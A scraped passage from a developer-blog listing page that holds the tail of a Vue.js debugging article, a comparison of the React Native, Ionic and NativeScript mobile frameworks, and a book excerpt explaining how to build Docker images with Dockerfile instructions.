component and inspect it. You’ll see all the data attached to this component. If you try to change something, for example, add a shopping list item, check or uncheck a checkbox, change the title, and so on, all these changes will be immediately propagated to the data in the Vue devtools. You will immediately see the changes on the right side of it. Let’s try, for example, to add shopping list item. Once you start typing, you see on the right how newItem changes accordingly: The changes in the models are immediately propagated to the Vue devtools data When we start adding more components and introduce complexity to our Vue applications, the debugging will certainly become more fun! Summary In this article we have analyzed the behind the scenes of Vue.js. We learned how to install Vue.js. We also learned how to debug Vue application. Resources for Article: Further resources on this subject: API with MongoDB and Node.js [Article] Tips & Tricks for Ext JS 3.x [Article] Working with Forms using REST API [Article]
Read more
  • 0
  • 0
  • 74441
article-image-javascript-mobile-frameworks-comparison-react-native-vs-ionic-vs-nativescript
Bhagyashree R
03 Nov 2018
11 min read
Save for later

JavaScript mobile frameworks comparison: React Native vs Ionic vs NativeScript

Bhagyashree R
03 Nov 2018
11 min read
Previously, when you wanted to build for both web and mobile, you would have to invest in separate teams with separate development workflows. Isn't that annoying? JavaScript-driven frameworks have changed this equation. You can now build mobile apps without having to learn a completely new language such as Kotlin, Java, Objective C, and development approach and use your current skills of web development. One of the first technologies to do this was Cordova, which enabled web developers to package their web apps into a native binary, and to access device APIs through plugins. Since then, developers have created a variety of alternative approaches to using JavaScript to drive native iOS and Android applications. In this article we will talk about three of these frameworks: React Native, Ionic, and NativeScript. After introducing you to these frameworks, we will move on to their comparison and try to find which one of them is best on what scenarios. What exactly are native and hybrid applications? Before we start with the comparison, let’s answer this simple question as we are going to use these terms a lot in this article. What are native applications? Native applications are built for a particular platform and are written in a particular language. For example, Android apps are written in Java or Kotlin, and iOS apps are written in Objective C and Swift. The word “native” here refers to a platform such as Android, iOS, or Windows phone. Designed for a specific platform, these apps are considered to be more efficient in terms of performance, as well as being more reliable. The downside of native applications is that a separate version of the app must be developed for each platform. As it is written in a completely different programming language, you can’t reuse any piece of code from another platform version. That’s why native app development is considered to be more time consuming and expensive in comparison to hybrid applications, at least in theory. What are hybrid applications? Unlike native applications, hybrid applications are cross-platform. They are written in languages such as C# or JavaScript and compiled to be executed on each platform. For device specific interactions, hybrid applications utilize the support of plugins.Developing them is faster and simpler. Also, they are less expensive as you have to develop only one app instead of developing multiple native apps for different platforms. The major challenge with hybrid apps is that they run in WebView which means they depend on the native browser. Because of this, hybrid apps aren’t as fast as native apps. You can also face serious challenges if the app requires complex interaction with the device. After all, there’s a limit to what plugins can achieve on this front. As all the rendering is done using web tech, we can’t produce a truly native user experience. Let’s now move on to the overview of the three frameworks: What is React Native? Source: React Native The story of React Native started in the summer of 2013 as Facebook’s internal hackathon project and it was later open sourced in 2015. React Native is a JavaScript framework used to build native mobile applications. As you might have already guessed from its name, React Native is based on React, a JavaScript library for building user interfaces. The reason why it is called “native” is that the UI built with React Native consists of native UI widgets that look and feel consistent with the apps you built using native languages. How does React Native work? Under the hood, React Native translates your UI definition written in Javascript/JSX into a hierarchy of native views correct for the target platform. For example, if we are building an iOS app, it will translate the Text primitive to a native iOS UIView, and in Android, it will result with a native TextView. So, even though we are writing a JavaScript application, we do not get a web app embedded inside the shell of a mobile one. We are getting a “real native app”. But how does this “translation” takes place? React Native runs on JavaScriptCore, the JavaScript engine on iOS and Android, and then renders native components. React components return markup from their render function, which describes how they should look. With React for the Web, this translates directly to the browser’s DOM. For React Native, this markup is translated to suit the host platform, so a <View> might become an Android-specific TextView. Applications built with React Native All the recent features in the Facebook app such as Blood Donations, Crisis Response, Privacy Shortcuts, and Wellness Checks were built with React Native. Other companies or products that use this framework include Instagram, Bloomberg, Pinterest, Skype, Tesla, Uber, Walmart, Wix, Discord, Gyroscope, SoundCloud Pulse, Tencent QQ, Vogue, and many more. What is Ionic framework? Source: Ionic Framework The Ionic framework was created by Drifty Co. and was initially released in 2013. It is an open source, frontend SDK for developing hybrid mobile apps with familiar web technologies such as HTML5, CSS, and JavaScript. With Ionic, you will be able to build and deploy apps that work across multiple platforms, such as native iOS, Android, desktop, and the web as a Progressive Web App. How does Ionic framework work? Ionic is mainly focused on an application’s look and feel, or the UI interaction. This tells us that it’s not meant to replace Cordova or your favorite JavaScript framework. In fact, it still needs a native wrapper like Cordova to run your app as a mobile app. It uses these wrappers to gain access to host operating systems features such as Camera, GPS, Flashlight, etc. Ionic apps run in low-level browser shell like UIWebView in iOS or WebView in Android, which is wrapped by tools like Cordova/PhoneGap. Currently, Ionic Framework has official integration with Angular, and support for Vue and React are in development. They have recently released the Ionic 4 beta version, which comes with better support for Angular. This version supports the new Angular tooling and features, ensuring that Ionic apps follow Angular standards and conventions. Applications built with Ionic Some of the apps that use Ionic framework are MarketWatch, Pacifica, Sworkit, Vertfolio and many more. You can view the full list of applications built with Ionic framework on their website. What is NativeScript? Source: NativeScript NativeScript is developed by Telerik (a subsidiary of Progress) and was first released in 2014. It’s an open source framework that helps you build apps using JavaScript or any other language that transpiles to JavaScript, for example, TypeScript. It directly supports the Angular framework and supports the Vue framework via a community-developed plugin. Mobile applications built with NativeScript result in fully native apps, which use the same APIs as if they were developed in Xcode or Android Studio. Additionally, software developers can re-purpose third-party libraries from CocoaPods, Android Arsenal, Maven, and npm.js in their mobile applications without the need for wrappers. How does NativeScript work? Since the applications are built in JavaScript there is a need of some proxy mechanism to translate JavaScript code to the corresponding native APIs. This is done by the runtime parts of NativeScript, which act as a “bridge” between the JavaScript and the native world (Android and iOS). The runtimes facilitate calling APIs in the Android and iOS frameworks using JavaScript code. To do that JavaScript Virtual Machines are used - Google’s V8 for Android and WebKit’s JavaScriptCore implementation distributed with iOS 7.0+. Applications built with NativeScript Some of the applications built with NativeScript are Strudel, BitPoints Wallet, Regelneef, and Dwitch. React Native vs Ionic vs NativeScript Now that we’ve introduced all the three frameworks, let’s tackle the difficult question: which framework is better? #1 Learning curve The time for learning any technology will depend on the knowledge you already have. If you are a web developer familiar with HTML5, CSS, and Javascript, it will be fairly easy for you to get started with all the three frameworks. But if you are coming from a mobile development background, then the learning curve will be a bit steep for all the three. Among the three of them, the Ionic framework is easy to learn and implement and they also have great documentation. #2 Community support Going by the GitHub stats, React Native is way ahead the other two frameworks be it in terms of popularity of the repository or the number of contributors. This year's GitHub Octoverse report also highlighted that React Native is one of the most active open source project currently. The following table shows the stats at the time of writing: Framework Stars Forks Contributors React Native 70150 15712 1767 Ionic 35664 12205 272 NativeScript 15200 1129 119 Source: GitHub Comparing these three frameworks by the weekly package downloads from the npm website also indicate that React Native is the most popular framework among the three. The comparison is shown as follows: Source: npm trends #3 Performance Ionic apps, as mentioned earlier, are hybrid apps, which means they run on the WebView.  Hybrid applications, as mentioned in the beginning, are arguably slower as compared to the JavaScript-driven native applications, as their speed depends on the WebView. This also makes Ionic not so suitable for high performance or UI intensive apps such as for game development. React Native, in turn, provides faster application speed. Since, React works separately from the main UI thread, your application can maintain high performance without sacrificing capability. Additionally, the introduction of the React Fiber algorithm, which was implemented with the goal of visual rendering acceleration adds up to its better performance. In the case of NativeScript, rendering slows down a NativeScript application. Also, the applications built with NativeScript for the Android platform are larger in size. This large size of the application influences the performance in a negative way. #4 Marketplace The marketplace for Ionic is great. The tool lists many starter apps, themes, and plugins. Plugins range from a DatePicker to Google Maps. Similarly, NativeScript has its official marketplace listing 923 plugins in total. React Native, on the other hand, does not have a dedicated marketplace from Facebook. However, there are some companies that do provide React Native plugins and starter apps. #5 Reusability of the codebase Because Ionic is a framework for developing “wrapped applications", it wins the code reusability contest hands down. Essentially, the very concept of Ionic is “write once, run everywhere”. NativeScript isn’t far behind Ionic in terms of code reusability. In August this year, the Progress team announced that they are working on a Code-Sharing Project. To realize this code-sharing dream, together the Angular and NativeScript teams have created nativescript-schematics, a schematic that enables you to build both web and mobile apps from a single project. In the case of React Native, you will be able to reuse the logic and structure of the components, however, you would have to rewrite the UI used in them. React Native follows a different approach: “learn once, write everywhere”. This means that the same team of developers who built the iOS version will be able to understand enough to build the Android version, but they still need to have some knowledge of Android. With React Native you will end up having two separate projects. That’s fine because they are for two different platforms, but their internal structure will still be very similar. So, which JavaScript mobile framework is best? All three mobile frameworks come with their pros and cons. These frameworks are meant for the same objective but different project requirements. Choosing any one of them depends on your project, your user requirements, and the skills of your team. While Ionic comes with the benefit of a single codebase, it’s not suitable for graphics-intensive applications. React Native provides better performance than the other two, but adds the overhead of creating native shell for each platform. The best thing about NativeScript is that it supports Vue, which is one of fastest growing JavaScript frameworks. But its downside is that it makes the app size large. In the future we will see more such frameworks to help developers quickly prototype, develop, and ship cross-platform application. One of them is Flutter by Google which is already creating a wave. Nativescript 4.1 has been released React Native 0.57 released with major improvements in accessibility APIs, WKWebView-backed implementation, and more! Ionic framework announces Ionic 4 Beta
Read more
  • 0
  • 0
  • 73522

article-image-building-docker-images-using-dockerfiles
Aarthi Kumaraswamy
12 Apr 2018
8 min read
Save for later

Building Docker images using Dockerfiles

Aarthi Kumaraswamy
12 Apr 2018
8 min read
Docker images are read-only templates. They give us containers during runtime. Central to this is the concept of a 'base image'. Layers then sit on top of this base image. For example, you might have a base image of Fedora or Ubuntu, but you can then install packages or make modifications over the base image to create a new layer. The base image and new layer can then be treated as a completely  new image. In the image below, Debian is the base image and emacs and Apache are the two layers added on top of it. They are highly portable and can be shared easily: Source: Docker Image layers Layers are transparently laid on top of the base image to create a single coherent filesystem. There are a couple of ways to create images, one is by manually committing layers and the other way is through Dockerfiles. In this recipe, we'll create images with Dockerfiles. Dockerfiles help us in automating image creation and getting precisely the same image every time we want it. The Docker builder reads instructions from a text file (a Dockerfile) and executes them one after the other in order. It can be compared as Vagrant files, which allows you to configure VMs in a predictable manner. Getting ready A Dockerfile with build instructions. Create an empty directory: $ mkdir sample_image $ cd sample_image Create a file named Dockerfile with the following content: $ cat Dockerfile # Pick up the base image FROM fedora # Add author name MAINTAINER Neependra Khare # Add the command to run at the start of container CMD date How to do it… Run the following command inside the directory, where we created Dockerfile to build the image: $ docker build . We did not specify any repository or tag name while building the image. We can give those with the -toption as follows: $ docker build -t fedora/test . The preceding output is different from what we did earlier. However, here we are using a cache after each instruction. Docker tries to save the intermediate images as we saw earlier and tries to use them in subsequent builds to accelerate the build process. If you don't want to cache the intermediate images, then add the --no-cache option with the build. Let's take a look at the available images now: How it works… A context defines the files used to build the Docker image. In the preceding command, we define the context to the build. The build is done by the Docker daemon and the entire context is transferred to the daemon. This is why we see the Sending build context to Docker daemon 2.048 kB message. If there is a file named .dockerignore in the current working directory with the list of files and directories (new line separated), then those files and directories will be ignored by the build context. More details about .dockerignore can be found at https://docs.docker.com/reference/builder/#the-dockerignore-file. After executing each instruction, Docker commits the intermediate image and runs a container with it for the next instruction. After the next instruction has run, Docker will again commit the container to create the intermediate image and remove the intermediate container created in the previous step. For example, in the preceding screenshot, eb9f10384509 is an intermediate image and c5d4dd2b3db9 and ffb9303ab124 are the intermediate containers. After the last instruction is executed, the final image will be created. In this case, the final image is 4778dd1f1a7a: The -a option can be specified with the docker images command to look for intermediate layers: $ docker images -a There's more… The format of the Dockerfile is: INSTRUCTION arguments Generally, instructions are given in uppercase, but they are not case sensitive. They are evaluated in order. A # at the beginning is treated like a comment. Let's take a look at the different types of instructions: FROM: This must be the first instruction of any Dockerfile, which sets the base image for subsequent instructions. By default, the latest tag is assumed to be: FROM  <image> Alternatively, consider the following tag: FROM  <images>:<tag> There can be more than one FROM instruction in one Dockerfile to create multiple images. If only image names, such as Fedora and Ubuntu are given, then the images will be downloaded from the default Docker registry (Docker Hub). If you want to use private or third-party images, then you have to mention this as follows:  [registry_hostname[:port]/][user_name/](repository_name:version_tag) Here is an example using the preceding syntax: FROM registry-host:5000/nkhare/f20:httpd MAINTAINER: This sets the author for the generated image, MAINTAINER <name>. RUN: We can execute the RUN instruction in two ways—first, run in the shell (sh -c): RUN <command> <param1> ... <pamamN> Second, directly run an executable: RUN ["executable", "param1",...,"paramN" ] As we know with Docker, we create an overlay—a layer on top of another layer—to make the resulting image. Through each RUN instruction, we create and commit a layer on top of the earlier committed layer. A container can be started from any of the committed layers. By default, Docker tries to cache the layers committed by different RUN instructions, so that it can be used in subsequent builds. However, this behavior can be turned off using --no-cache flag while building the image. LABEL: Docker 1.6 added a new feature to the attached arbitrary key-value pair to Docker images and containers. We covered part of this in the Labeling and filtering containers recipe in Chapter 2, Working with Docker Containers. To give a label to an image, we use the LABEL instruction in the Dockerfile as LABEL distro=fedora21. CMD: The CMD instruction provides a default executable while starting a container. If the CMD instruction does not have an executable (parameter 2), then it will provide arguments to ENTRYPOINT. CMD  ["executable", "param1",...,"paramN" ] CMD ["param1", ... , "paramN"] CMD <command> <param1> ... <pamamN> Only one CMD instruction is allowed in a Dockerfile. If more than one is specified, then only the last one will be honored. ENTRYPOINT: This helps us configure the container as an executable. Similar to CMD, there can be at max one instruction for ENTRYPOINT; if more than one is specified, then only the last one will be honored: ENTRYPOINT  ["executable", "param1",...,"paramN" ] ENTRYPOINT <command> <param1> ... <pamamN> Once the parameters are defined with the ENTRYPOINT instruction, they cannot be overwritten at runtime. However, ENTRYPOINT can be used as CMD, if we want to use different parameters to ENTRYPOINT. EXPOSE: This exposes the network ports on the container on which it will listen at runtime: EXPOSE  <port> [<port> ... ] We can also expose a port while starting the container. We covered this in the Exposing a port while starting a container recipe in Chapter 2, Working with Docker Containers. ENV: This will set the environment variable <key> to <value>. It will be passed all the future instructions and will persist when a container is run from the resulting image: ENV <key> <value> ADD: This copies files from the source to the destination: ADD <src> <dest> The following one is for the path containing white spaces: ADD ["<src>"... "<dest>"] <src>: This must be the file or directory inside the build directory from which we are building an image, which is also called the context of the build. A source can be a remote URL as well. <dest>: This must be the absolute path inside the container in which the files/directories from the source will be copied. COPY: This is similar to ADD.COPY <src> <dest>: COPY  ["<src>"... "<dest>"] VOLUME: This instruction will create a mount point with the given name and flag it as mounting the external volume using the following syntax: VOLUME ["/data"] Alternatively, you can use the following code: VOLUME /data USER: This sets the username for any of the following run instructions using the following syntax: USER  <username>/<UID> WORKDIR: This sets the working directory for the RUN, CMD, and ENTRYPOINT instructions that follow it. It can have multiple entries in the same Dockerfile. A relative path can be given which will be relative to the earlier WORKDIR instruction using the following syntax: WORKDIR <PATH> ONBUILD: This adds trigger instructions to the image that will be executed later, when this image will be used as the base image of another image. This trigger will run as part of the FROM instruction in downstream Dockerfile using the following syntax: ONBUILD [INSTRUCTION] See also Look at the help option of docker build: $ docker build -help The documentation on the Docker website https://docs.docker.com/reference/builder/ You just enjoyed an excerpt from the book, DevOps: Puppet, Docker, and Kubernetes by Thomas Uphill, John Arundel, Neependra Khare, Hideto Saito, Hui-Chuan Chloe Lee, and Ke-Jou Carol Hsu. To master working with Docker containers, images and much more, check out this book today! Read other posts: How to publish Docker and integrate with Maven Building Scalable Microservices How to deploy RethinkDB using Docker  
Read more
  • 0
  • 0
  • 73363
Modal Close icon
Modal Close icon